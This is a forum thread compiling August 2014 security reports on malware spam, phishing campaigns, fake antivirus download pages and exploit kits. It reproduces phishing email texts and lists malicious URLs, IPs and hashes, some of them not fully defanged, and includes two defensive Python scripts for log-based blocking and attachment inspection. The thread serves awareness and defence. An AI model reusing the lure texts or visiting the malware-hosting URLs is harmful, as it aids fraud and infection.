- https://blog.malwarebytes.org/fraud-scam/2014/08/tech-support-scammers-rip-big-brand-security-software-with-fake-warnings/
Aug 21 2014 - "... bogus tech support. If you are looking to download one of the popular antivirus or anti-malware products on the market, watch out before you click.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/listAVs-965x395.png
Lookalike pages: Fraudsters have set up -fake- download pages that look incredibly like the authentic ones... Hijacked software: Each page links to a download, which of course is -not- the actual software...
> https://blog.malwarebytes.org/wp-content/uploads/2014/07/software.png
The purpose of these fake programs is to trick people into thinking something is wrong with their computers:
> https://blog.malwarebytes.org/wp-content/uploads/2014/07/error.png
The fake pages are hosted here:
hzzzp ://onlineinstanthelp .com/antivirus-download.html
hzzzp ://onlineinstanthelp .com/norton-us/download.html
hzzzp ://onlineinstanthelp .com/mcafee-us/download.html
hzzzp ://onlineinstanthelp .com/avg-us/download.html
hzzzp ://onlineinstanthelp .com/malwarebytes-us/download.html
hzzzp ://onlineinstanthelp .com/winzip-us/download.html
hzzzp ://onlineinstanthelp .com/lavasoft-us/download.html
The company providing ‘support’ is: wefixbrowsers .com ... We are reporting the sites to the registrar and passing on the LogMeIn codes so that interested parties can take appropriate actions. To avoid these -fake- installers, users should always go to the company’s official website..."
(More detail at the malwarebytes URL at the top.)

wefixbrowsers .com / 23.91.123.204: https://www.virustotal.com/en/ip-address/23.91.123.204/information/

onlineinstanthelp .com / 118.139.186.35: https://www.virustotal.com/en/ip-address/118.139.186.35/information/
___

Fake HMRC SPAM - malware
- http://myonlinesecurity.co.uk/helping-business-onile-malware/
21 Aug 2014 - "'Helping your Business onile' pretending to come from 'HMRC Business Help and Education Emails' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/08/Helping-your-Business-onile.png

21 August 2014 Credit_file_961529461.zip ( 50 kb)... Current Virus total detections: 1/51*
... targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened..."
* https://www.virustotal.com/en/file/050eae9a0470d35275c74159872ddf4232430ec6890b3d411769e2622c0183f8/analysis/1408620337/
___

Fake Credit reference SPAM - word Doc malware
- http://myonlinesecurity.co.uk/re-credit-reference-file-request-108278994-fake-word-doc-malware/
21 Aug 2014 - "'RE: Credit reference file request.(108278994)' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
Dear <REDACTED>
You have obtain a copy of your credit reference file.
We’re happy to help you with any questions or concerns you may have. Please contact us directly 24/7 .
Lynn Buck.

21 August 2014: Credit_file_108278994.zip (52 kb): Extracts to Credit reference file.doc.scr
Current Virus total detections: 2/52*
21 August 2014: Credit_file_642094175.zip (85kb): Extracts to credit_reference_file.xls.scr
Current Virus total detections: 2/52*
This 'RE: Credit reference file request.(108278994)' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word file instead of the .scr executable file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4326821ac04b6e7d4c36093065b01e7d2ea6931818532c01a5988d2782110aaf/analysis/1408613742/
___

JPMorgan customers targeted in phishing campaign
- http://www.reuters.com/article/2014/08/21/us-cybercrime-jpmorgan-spam-idUSKBN0GL20R20140821
Aug 21, 2014 - "Fraudsters are targeting JPMorgan Chase & Co customers in an email "phishing" campaign that is unusual because it attempts to collect credentials for that bank and also infect PCs with a virus for stealing passwords from -other- institutions. The campaign, dubbed "Smash and Grab," was launched on Tuesday with a widely distributed email that urged recipients to click to view a secure message from JPMorgan, according to security researchers with corporate email provider Proofpoint Inc. JPMorgan, the No. 1 U.S. bank by assets, confirmed that spammers had launched a phishing campaign targeting its customers... the bank believes most of the spam was stopped by fraud filters at large Internet providers, adding that the email looked realistic because the attackers apparently used a screen grab from an authentic email sent by the bank. Users who click on a malicious link are asked to enter credentials for accessing accounts with JPMorgan. Even if they did not comply, the site attempted to automatically install the Dyre banking Trojan* on their PCs, according to Proofpoint. Dyre is a recently discovered piece of malware that seeks credentials from customers of Bank of America Corp, Citigroup Inc and the Royal Bank of Scotland Group PLC, according to email security firm Phishme."
* http://blog.malcovery.com/blog/dyre-banking-trojan-what-you-need-to-know

> https://www.brainyquote.com/quotes/quotes/b/benjaminfr122731.html
"Distrust and caution are the parents of security" - Ben Franklin

:mad: :fear::fear:

AplusWebMaster
2014-08-22, 15:49
FYI...

WordPress attacks exploiting XMLRPC
- http://myonlinesecurity.co.uk/ongoing-wordpress-attacks-exploiting-xmlrpc/
Aug 22, 2014 - "We are experiencing Ongoing WordPress attacks exploiting XMLRPC. There appears to be a massive attack on WordPress sites today. So far I have had almost -1600- blocked attacks against ONE of my WordPress sites... Anybody using WordPress should make sure that they are plugged and use a good security system to prevent or -block- these attacks. It appears to be using the attack mentioned in this post:
> http://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html
... -None- of the current wordpress security plugins will -block- this and you need to make sure that you have a strong random password on your admin account. The -only- way to block them is on the perimeter, that is use a firewall that blocks the offending IP numbers that are responsible for the attacks. They are all coming from other compromised servers or hacked users computers..."
(More detail at the URLs above.)
___

Fake ADP 'Anti-Fraud Secure Update' SPAM – PDF malware
- http://myonlinesecurity.co.uk/adp-august-22-2014-anti-fraud-secure-update-fake-pdf-malware/
22 Aug 2014 - "'ADP: August 22, 2014 Anti-Fraud Secure Update' pretending to come from ADP_Netsecure@ adp .com is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:
Dear Valued ADP Client,
We are pleased to announce that ADP Payroll System released secure upgrades to your computer.
A new version of secure update is available.
Our development division strongly recommends you to download this software update.
It contains new features:
The certificate will be attached to the computer of the account holder, which disables any fraud activity
Any irregular activity on your account is detected by our safety centre
Download the attachment. Update will be automatically installed by double click.
We value our partnership with you and take pride in the confidence that you place in us to process payroll on your behalf. As always, your ADP Service Team is happy to assist with any questions you may have...

22 August 2014 : 2014 Anti-Fraud Secure Update_08222014.zip (9kb)
Extracts to 2014 Anti-Fraud Secure Update_08222014.exe
Current Virus total detections: 3/54* . This 'ADP: August 22, 2014 Anti-Fraud Secure Update' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/81e695f628436a4850bec46b3f90906433a0d11ae163f298f48fae788362d29a/analysis/1408710186/

- http://threattrack.tumblr.com/post/95457720908/adp-anti-fraud-update-spam
22 Aug 2014 - "Subjects Seen:
ADP: August 22, 2014 Anti-Fraud Secure Update
Typical e-mail details:

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/0ce8b26a9ef99d5ebbb8f37a1f29e47d/tumblr_inline_napm4cGa8i1r6pupn.png

Malicious File Name and MD5:
2014 Anti-Fraud Secure Update_08222014.scr (840B3B6A714F7330706F0C19F99D5EB8)
2014 Anti-Fraud Secure Update_08222014.zip (AB0D93E0952BDCE45D6E6494DF4D94AD)

Tagged: ADP, Upatre
___

"FlashPack" - add-on targets Japanese users, leads To exploit kit
- http://blog.trendmicro.com/trendlabs-security-intelligence/website-add-on-targets-japanese-users-leads-to-exploit-kit/
Aug 21, 2014 - "... In order to affect users, this particular exploit kit does -not- rely on spammed messages or compromised websites: instead, it uses a compromised website add-on. This particular add-on is used by site owners who want to add social media sharing buttons on their sites. All the site owner would have to do is add several lines of JavaScript code to their site’s design template. This code is freely available from the website of the add-on. The added script adds an overlay like this to the site’s pages:
Added share buttons:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/toolbar.png
To do this, a JavaScript file on the home page of the add-on is loaded. This alone should raise red flags: it means that the site owner is loading scripts from an external server -not- under their control. It’s one thing if it loads scripts on trusted sites like Google, Facebook, or other well-known names; it’s another thing to load scripts on little-known servers with no name to protect. As it turns out, this script is being used for malicious purposes. On certain sites, instead of the original add-on script, the user is redirected to the script of FlashPack... loading the s.js file directly will simply load the “correct” script for the add-on. One site which, if found in the Referer header, will trigger the exploit kit is a well-known free blogging site in Japan. The exploit kit delivers various Flash -exploits- to -targeted- users... At least approximately 58,000 users have been affected by this attack, with more than 87% of these coming from Japan. The landing pages of the exploit kit are hosted in servers in the Czech Republic, the Netherlands, and Russia.
Number of hits by country from August 1 to 17
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/Number-of-Hits-by-Country-01.jpg
How can users and site owners prevent these attacks? Site owners should be very cautious about adding add-ons to their site that rely on externally hosted scripts. As shown in this attack, they are trivial to use in malicious activities. In addition, they can slow the site down as well. Alternatives that host the script on the same server as the site itself are preferable. This incident illustrates for end users the importance of keeping-software-patched. The vulnerability we mentioned above has been fixed for half-a-year. Various auto-update mechanisms exist which can keep Flash up-to-date..."

:fear::fear: :mad:
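As an added, defender-side example (not code from the original post or from the linked myonlinesecurity/Sucuri articles), the Python script below does the perimeter part of the XML-RPC advice above: it reads Apache/nginx combined-format access logs, counts POST requests to xmlrpc.php per source IP inside a sliding time window, and renders firewall drop rules for IPs that cross a threshold. The log lines, timestamps and IP addresses are constructed for illustration; the threshold and window are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx "combined" access-log format (only the fields we need).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Parse one access-log line; return a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def xmlrpc_offenders(lines, threshold=20, window=timedelta(minutes=5)):
    """Map source IP -> peak number of POSTs to xmlrpc.php seen inside any
    `window`, keeping only IPs whose peak reaches `threshold`."""
    stamps_by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line: skip it rather than abort the run
        path = rec["path"].split("?", 1)[0]
        if rec["method"] == "POST" and path.endswith("/xmlrpc.php"):
            stamps_by_ip[rec["ip"]].append(rec["ts"])

    offenders = {}
    for ip, stamps in stamps_by_ip.items():
        stamps.sort()
        peak, start = 0, 0
        for end, ts in enumerate(stamps):
            # slide the window start forward until [start, end] fits in `window`
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            offenders[ip] = peak
    return offenders


def blocklist_rules(offenders):
    """Render perimeter drop rules (iptables syntax) for the offending IPs."""
    return [f"iptables -I INPUT -s {ip} -j DROP" for ip in sorted(offenders)]


# Constructed sample log (RFC 5737 documentation addresses): one brute-forcer
# sending 30 POSTs in a minute, one normal visitor whose single xmlrpc.php POST
# is a legitimate pingback, and one line that does not parse at all.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Aug/2014:09:00:%02d +0100] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/4.0"' % s
    for s in range(0, 60, 2)
] + [
    '198.51.100.9 - - [22/Aug/2014:09:00:05 +0100] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [22/Aug/2014:09:00:30 +0100] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "WordPress/3.9; pingback"',
    'not a log line',
]

if __name__ == "__main__":
    for rule in blocklist_rules(xmlrpc_offenders(SAMPLE_LOG)):
        print(rule)  # prints one DROP rule for 203.0.113.7
```

A single legitimate pingback POST never reaches the threshold, so the normal visitor is not blocked; lowering the window shows the sliding count rather than the raw total.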

AplusWebMaster
2014-08-24, 13:17
FYI...

My Photos SPAM - malware
- http://myonlinesecurity.co.uk/photos-malware/
23 Aug 2014 - "'My Photos' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Very simple email with content just saying 'Please find attached photos of my birthday party.' This one is particularly nasty and dangerous because it doesn’t give any outward signs of infection. It downloads an auto-configure script from http ://construtoralondres.zip .net/JScript32.log which then attempts to send all traffic through a proxy server http ://supermercadorleves.ddns .net which then filters out UK banking traffic to another proxy where they can steal all your banking log on and account information. Each UK bank is sent to a -different- proxy where the sites are set up to intercept traffic to the genuine UK bank site. That way, you think that you are on the genuine UK bank site and you actually are, but the proxy between you and the bank can read -everything- you type or do on the bank site. You have absolutely no idea that this is happening & you still get a padlock in the address bar to say that you are on a safe site.

23 August 2014: My Photos.zip ( 8kb): Extracts to My Photos.exe
Current Virus total detections: 10/50* . All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, and then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened."
* https://www.virustotal.com/en/file/8ef000f729f060a55aabaae7f16dc0e4da1108cdb8fef189dbafaa5b220b5ff0/analysis/1408799346/

zip .net / 200.147.99.195: https://www.virustotal.com/en/ip-address/200.147.99.195/information/
- http://quttera.com/detailed_report/zip.net
Submission date: Aug 24 16:53:51 2014
Server IP address: 200.147.99.195
"Warning: This Website Is Blacklisted!..."

ddns .net / 8.23.224.108: https://www.virustotal.com/en/ip-address/8.23.224.108/information/
- http://quttera.com/detailed_report/ddns.net
Submission date: Aug 24 16:46:40 2014
Server IP address: 8.23.224.108
"Alert: Suspicious Content Detected On This Website!..."
___

Sony PlayStation Network taken down by attack
- http://www.reuters.com/article/2014/08/25/us-sony-network-idUSKBN0GP02620140825
Aug 24, 2014 - "Sony Corp said on Sunday its PlayStation Network was taken down by a denial of service-style attack and the FBI was investigating the diversion of a flight carrying a top Sony executive amid reports of a claim that explosives were on board. The company said in a posting on its PlayStation blog that no personal information of the network was accessed in the attack, which overwhelmed the system with heavy traffic..."

- http://www.reuters.com/article/2014/08/25/us-sony-network-idUSKBN0GP02620140825
Aug 25, 2014 - "Sony Corp's PlayStation Network was back online on Monday following a cyber attack that took it down over the weekend, which coincided with a bomb scare on a commercial flight carrying a top Sony executive in the United States. Sony said on its PlayStation blog that its PlayStation network had been taken down by a denial of service-style attack, which overwhelmed the system with traffic, but did not intrude onto the network or access any of its 53 million users' information..."

:mad: :fear: :sad:

AplusWebMaster
2014-08-25, 14:51
FYI...

Fake Invoice SPAM - PDF Malware
- http://myonlinesecurity.co.uk/please-find-attached-invoice-fake-pdf-malware/
25 Aug 2014 - "'Please find attached Invoice No.' < random number> pretending to come from portadown.372@eel .co.uk is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... These emails are -not- being sent from eel .co.uk or edmundson-electrical .co.uk. As far as we can determine they have not been hacked or their website or email system compromised. The bad guys have just decided to use Edmundson Electrical Ltd as a way to persuade you to open the attachment and become infected. It is a follow on campaign from this Broadoak toiletries attack:
> http://myonlinesecurity.co.uk/invoice-951266-fake-pdf-malware/
Once again this email template has several different sized malwares attached to it and it appears random which version you get... Email looks like:
WALSALL
MAHON RD IND EST. PORTADOWN
CO. ARMAGH BT62 3EH
T:028 3833 5316
F:028 3833 8453
Please find attached Invoice No. 3036 – 8340637
Best
Branch Manager
Registered Office: PO Box 1 Knutsford Cheshire WA16 6AY ...

25 August 2014: 3036 – 8340637.zip (44kb): Extracts to Invoice 372 – 667911.exe
Current Virus total detections: 2/55*
25 August 2014: 0463 – 485325.zip (47kb): Extracts to Invoice 829 – 991882.exe
Current Virus total detections: 2/51**
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e9b4e4ffb3943a08bc1c7b7bc7548aa5ce6e53375514081caf8d8973eadf5c87/analysis/1408955315/

** https://www.virustotal.com/en/file/cbd0a0fe8caa5e02e05ae196b89d3d1d1f6f680b00403add549b12356e2d8013/analysis/1408955404/
___

Fake Fax SPAM - pdf malware
- http://myonlinesecurity.co.uk/fax-arrived-remote-id-866-905-0884-fake-pdf-malware/
25 Aug 2014 - "'A fax has arrived from remote ID ’866-905-0884' pretending to come from RFaxSMTP MTGm <RIGHTFAX@ mtgmfaxmail .bankofamerica .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:
A fax has arrived from remote ID ’866-905-0884′.
————————————————————
Transmission Record
Received from remote ID: ’866-905-0884′
Inbound user ID derek, routing code 669164574
Result: (0/352;0/0) Successful Send
Page record: 1 – 2
Elapsed time: 00:39 on channel 34 ...

25 August 2014: Fax_Remote_ID.zip ( 13kb) : Extracts to Fax_Remote_ID.scr
Current Virus total detections: 0/55* . This 'A fax has arrived from remote ID 866-905-0884' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/37bbf261819afd6fabb75cb8815d4651e09329ab5cb8fe0b01d376096f195ab6/analysis/1408971894/
___

Bank of America Activity Alert Spam
- http://threattrack.tumblr.com/post/95740068388/bank-of-america-activity-alert-spam
Aug 25, 2014 - "Subjects Seen:
Bank of America Alert: A Check Exceeded Your Requested Alert Limit
Typical e-mail details:
Activity Alert
A check exceeded your requested alert limit
We’re letting you know a check written from your account went over the limit you set for this alert.
For more details please check attached file

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/4bf4d24ed5d86a6ec8c689e611edac36/tumblr_inline_navd12Tu861r6pupn.png

Malicious File Name and MD5:
report08252014_6897454147412.vcr (7ED898AA2A8B247F7C7A46D71B125EA8)
report08252014_6897454147412.zip (FF4C74D80D3C7125962D7316F570A7FF)

Tagged: Bank of America, Upatre
___

Facebook Work From Home SCAM
- http://www.hoax-slayer.com/facebook-work-from-home-program-scam.shtml
Aug 25, 2014 - "Message claims that Facebook has launched a new 'Work From Home' program that will allow users to make money from the comfort of their own homes... The message is a scam. Facebook has not launched such a program and has no connection to the scheme. The link in the message takes you to a fake Facebook Page that tries to trick you into paying four dollars for a dodgy 'Facebook Millionaire' kit. Fine print on the signup form indicates that your credit card will be charged $94 per month for continued access. Do -not- be tempted to participate in this -bogus- program.
> http://www.hoax-slayer.com/images/facebook-work-from-home-program-scam-1.jpg
... It claims that people can potentially make thousands of dollars per month but warns that only a limited number of 'positions' are available... If this message comes your way, do -not- click any links it contains..."
___

Fake ADP SPAM - PDF malware
- http://myonlinesecurity.co.uk/adp-invoice-week-ending-08222014-invoice-447589545-fake-pdf-malware/
25 Aug 2014 - "'ADP Invoice for week ending 08/22/2014 Invoice: 447589545' pretending to come from Billing.Address.Updates@ ADP .com is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
Your most recent ADP invoice is attached for your review. If you have any questions regarding this invoice, please contact your ADP service team at the number or e-mail address provided on the invoice for assistance.
Thank you for choosing ADP for your business solutions.
Important: Please do not respond to this message. It is generated from an unattended mailbox.

25 August 2014: invoice_447589545.zip (10kb): Extracts to invoice_447589545.exe
Current Virus total detections: 2/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/511aae72f63fd0256b7210d8a20afc75df7d1225ac054ec732a7fee43d11657b/analysis/1408992097/
___

BoA Merrill Lynch CashPro Spam
- http://threattrack.tumblr.com/post/95756978548/bank-of-america-merrill-lynch-cashpro-spam
Aug 25, 2014 - "Subjects Seen:
Bank of America Merrill Lynch: Completion of request for ACH CashPro
Typical e-mail details:
You have received a secure message from Bank of America Merrill Lynch
Read your secure message by opening the attachment, securedoc.html. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it in a Web browser.
If you have concerns about the validity of this message, contact the sender directly.
First time users - will need to register after opening the attachment.

Malicious URLs:
161.58.101.183/handler/jxpiinstall.exe

Malicious File Name and MD5:
securedoc.html (D6E1DD6973F8FAA730941A19770C97F2)
jxpiinstall.exe (C3110BFDD8536DC627336D7F7A6CC2E7)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f63cc48713e65cd81bd3d292795f917a/tumblr_inline_navorjRagN1r6pupn.png

Tagged: Bank of America, Merrill Lynch, tuscas

161.58.101.183: https://www.virustotal.com/en/ip-address/161.58.101.183/information/

:mad: :fear: :sad:
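The recurring advice in these posts is to enable "show known file extensions" and refuse anything that unzips to .exe or .scr. As an added example (not code from the original posts or from myonlinesecurity), this Python script automates that check on a zip attachment: it flags executable extensions, document-style double extensions such as .doc.scr, and a Windows PE ("MZ") header hiding under a document name, which catches a renamed executable even when the extension looks safe. The sample archive and its contents are constructed in memory and contain no real malware.

```python
import io
import zipfile
from dataclasses import dataclass, field

# Extensions Windows will run on double-click (the .exe / .scr cases above).
EXEC_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse",
             "vbs", "vbe", "wsf", "hta", "cpl"}
# Extensions a recipient expects on a genuine attachment; a spoofed-icon file
# puts one of these just before the real executable extension.
DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "rtf", "jpg", "jpeg", "png", "gif"}


@dataclass
class Finding:
    member: str
    reasons: list = field(default_factory=list)


def _extensions(name):
    """All dotted suffixes of a member name, lower-cased: 'a.doc.scr' -> ['doc', 'scr']."""
    base = name.rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    return parts[1:] if len(parts) > 1 else []


def inspect_attachment(zip_bytes):
    """Return a Finding for every archive member that should not be opened."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            exts = _extensions(info.filename)
            reasons = []
            if exts and exts[-1] in EXEC_EXTS:
                reasons.append(f"executable extension .{exts[-1]}")
            if len(exts) >= 2 and exts[-2] in DOC_EXTS and exts[-1] in EXEC_EXTS:
                reasons.append(f"document extension .{exts[-2]} masks .{exts[-1]}")
            # Content check: the name can lie, the first two bytes of a PE cannot.
            with zf.open(info) as fh:
                head = fh.read(2)
            if head == b"MZ":
                reasons.append("Windows PE header (MZ)")
            if reasons:
                findings.append(Finding(info.filename, reasons))
    return findings


def build_constructed_sample():
    """In-memory archive mimicking the campaigns above (constructed, not real samples)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        pe_stub = b"MZ" + b"\x00" * 62  # DOS signature only, nothing executable
        zf.writestr("Invoice 372 - 667911.exe", pe_stub)
        zf.writestr("Credit reference file.doc.scr", pe_stub)
        zf.writestr("report.pdf", pe_stub)  # PE renamed to look like a document
        zf.writestr("readme.txt", b"plain text, nothing to flag")
    return buf.getvalue()


if __name__ == "__main__":
    for f in inspect_attachment(build_constructed_sample()):
        print(f"{f.member}: {'; '.join(f.reasons)}")
```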

AplusWebMaster
2014-08-26, 12:21
FYI...

Fake Vodafone SPAM
- http://blog.dynamoo.com/2014/08/vodafone-mms-service-malware-spam.html
26 Aug 2014 - "This -fake- Vodafone spam comes with a malicious attachment. There is no body text as such, the header reads:
From: Vodafone MMS service [mms813562@ vodafone .co.uk]
Date: 26 August 2014 12:00
Subject: IMG Id 813562-PictQbmR TYPE--MMS

The version I had was mangled and the attachment was just called noname which required a bit of work to turn into a ZIP file IMG Id 813562-PicYbgRr TYPE--MMS.zip which in turn contains a malicious executable Picture Id 550125-PicSfdce TYPE-MMS.exe. This .EXE file has a VirusTotal detection rate of 3/55*. The malware then attempts to download additional components... This second component has a VirusTotal detection rate of 3/53**... I would recommend the following blocklist:
192.254.186.106 ..."
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/fe088d41e44b4c63ea6c4ed572f4537dc19265bddc56a567b61587b35819511d/analysis/1409051519/

** https://www.virustotal.com/en-gb/file/8aa74dba2e258b6965c8e3e68480ac5912f52fd85dc6c96839cce0c23123e776/analysis/1409052175/

192.254.186.106: https://www.virustotal.com/en/ip-address/192.254.186.106/information/
___

Phishers hook Facebook Users via SMS
- https://blog.malwarebytes.org/fraud-scam/2014/08/phishers-hook-facebook-users-via-sms/
Aug 26, 2014 - "If you happen to receive an SMS message from a potentially unknown recipient with the following text—
wtf f***** remove this pic from Facebook. http ://bit[dot]do/fbnudephotos
... much like the fellow on the screenshot:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/SMS.png
...then you’ve been targeted by a phishing campaign. The bit .do link is the shortened URL for a publicly available HTML page hosted on a Dropbox account. It looks like this:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/dbox-phish.png
All links but one – the 'Get Facebook for iPhone and browse faster' link – lead to a 404 page. The aforementioned link leads to the actual iTunes app download page. The full code of the page is actually hex encoded and executed by the unescape() function... Once users provide their Facebook credentials to the page, these are then posted to a .PHP page hosted on 193[dot]107[dot]17[dot]68, which we found out to be quite a popular location for hosting malware. While this happens in the background, users are directed to the following screenshot which serves as humour, if not a “Gotcha!” after a successful con:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/unibrow.png
... Individuals or groups with bad intent have been using SMS as a way to -scam- people, either for their money or for their information. Senior Security Researcher Jérôme Segura has published a post entitled “SMS Scams: How To Defend Yourself”* back in 2013, which I recommend you... read as well. His thoughts on this kind of fraud remain relevant to this date..."
* https://blog.malwarebytes.org/intelligence/2013/07/sms-scams-how-to-defend-yourself/

193.107.17.68: https://www.virustotal.com/en/ip-address/193.107.17.68/information/
___

Vacation SCAMS ...
- https://blog.malwarebytes.org/fraud-scam/2014/08/leave-these-vacation-scams-at-the-border/
Aug 26, 2014 - "... common travel scams and things to be wary of right now... First up, we have an Infographic over at the Just the flight blog which details 40 tourist scams to avoid*, along with common locations for said scams:
* http://www.justtheflight.co.uk/blog/16-40-tourist-scams-to-avoid-this-summer.html
... Whether you’re being driven to fake hotels by taxi drivers in on the act, looking at bogus takeaway menus slipped under your hotel door, accosted by pretend policemen or trying to catch a fake baby (no really) thrown in your general direction by a scammer working with pickpockets... Next up, we have some advice on the South China Morning Post in relation to travelling alone**, which includes tips and advice alongside links to additional information. Well worth a look if you’re planning on upping sticks and going solo:
** http://www.scmp.com/magazines/48hrs/article/1574227/roam-alone-tips-single-traveller
Finally, there’s a device which can be placed inside jewelry and perform numerous functions while on the move, including sending alert messages*** in case of emergency:
*** http://www.bust.com/this-stylish-jewelry-could-keep-you-safe.html
Wherever you go, you can be sure con-jobs and fakeouts lie in wait and the sensible traveler will do a little background reading before wandering off to parts unknown. It pays to keep your wits about you whether at home or abroad..."
(More at the malwarebytes URL at the top.)
___

SourceForge sub-domain redirects to Flash-Pack-Exploit-Kit
- https://blog.malwarebytes.org/exploits-2/2014/08/sub-domain-on-sourceforge-redirects-to-flash-pack-exploit-kit/
Aug 25, 2014 - "We have talked about SourceForge before on this blog, in particular when they were associated with -bundled- software... take a look at an infected sub-domain hosted on SourceForge responsible for a drive-by download attack... This calls to stat-count .dnsdynamic .com a domain previously identified* as a source of malicious activity. This one is no different...
* https://www.virustotal.com/en/domain/stat-count.dnsdynamic.com/information/
... You may recognize the URL landing for the Flash Pack Exploit Kit. There is an interesting series of -redirections- ... The last URL is a Flash file, VT detection here:
> https://www.virustotal.com/en/file/6082e26c223171124388ba2cf01e65840ef997863f42e418998d97e4fbcd6803/analysis/1408996053/
... A Flash file with a peculiar name for its classes:
> https://www.virustotal.com/en/file/3fc9204595ccfacae5624653d96b95e60d25609f560e543054525ca2e56cb0b6/analysis/1408979154/
The payload (VT results**) is detected by Malwarebytes Anti-Malware as Trojan.Agent.ED... We have spotted similar redirections to the Flash Pack exploit kit in other popular sites as well. Whether it is part of a larger campaign is hard to say but it is particularly active at the moment. Drive-by download attacks are the number -one- vector for malware infections. Legitimate websites often fall victim to malicious -injections- stealing incoming traffic and sending it to booby-trapped pages. Within seconds, an unpatched computer could get infected with a nasty piece of malware..."
(More detail at the malwarebytes URL at the top.)
** https://www.virustotal.com/en/file/5df51346ec3d96e781650488caaad85e64afbd2c45ca6228f7c6eddeb70de464/analysis/1408996125/

dnsdynamic .com - 84.45.76.100: https://www.virustotal.com/en/ip-address/84.45.76.100/information/

:fear::fear: :mad:

AplusWebMaster
2014-08-27, 13:41
FYI...

Fake Invoice SPAM - malicious attachment ...
- http://blog.dynamoo.com/2014/08/morupule-coal-mine-malware-spam.html
27 Aug 2014 - "This -fake- invoice spam claims to be from a (real) coal mine in Botswana. But in fact the PDF file attached to the message is malicious.
From: Madikwe, Gladness [GMadikwe@mcm.co.uk]
Date: 27 August 2014 10:43
Subject: Tax Invoice for Delivery Note 11155 dated 22.08.14
Hello ,
Please find attached the invoice for delivery note 11155 which was created on the 22 . 08. 14 after a system error to process this tax invoice.
Thank you
Regards
Gladness B Madikwe
Sales & Marketing Clerk
Morupule Coal Mine ...

Screenshot: http://1.bp.blogspot.com/-1wXuSVrxknQ/U_2vj2r9FGI/AAAAAAAAFVs/qn_Ls8u3nTM/s1600/moropule.png

